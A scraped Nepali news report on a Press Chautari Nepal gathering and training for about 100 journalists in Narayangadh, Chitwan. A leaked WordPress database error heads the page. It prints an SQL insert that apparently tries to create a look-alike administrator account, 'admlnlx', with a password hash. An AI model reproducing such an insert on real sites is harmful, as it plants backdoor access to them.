WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuHlSC1VbgzgkBWKZnPYjtldMwRWfq0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 14:36:18', '', 'admlnlx', 'admlnlx')
चितवन,माघ २५-
प्रेस चौतारी नेपाल चितवन शाखाले आज नारायणगढमा बृहत भेला तथा प्रशिक्षण कार्यक्रम गरेको छ । भेलामा जिल्लाका क्रियाशिल करिव १ सय जनाको पत्रकारहरुको सहभागीता रहेको थियो ।प्रेस चौतारीका सदस्यहरुलाई संगठनका बारेमा प्रशिक्षण र आसन्न पत्रकार महासंघको निर्वाचनका बारेमा निर्देशन दिइएको थियो ।
भेलामा एमालेका केन्द्रीय प्रचार विभागका उपप्रमुख सूर्य थापा, विभागका सचिव विष्णु रिजाल, चौतारीका केन्द्रीय अध्यक्ष गणेश बस्नेत, पूर्व अध्यक्ष राजेन्द्र अर्याल, चौतारीका बरिष्ठ उपाध्यक्ष माधव नेपाल, महासचिव राजेश राईले प्रशिक्षण दिएका थिए ।सो अवसरमा प्रेस चौतारीका नवप्रवेसीहरुलाई स्वागत गरिएको थियो ।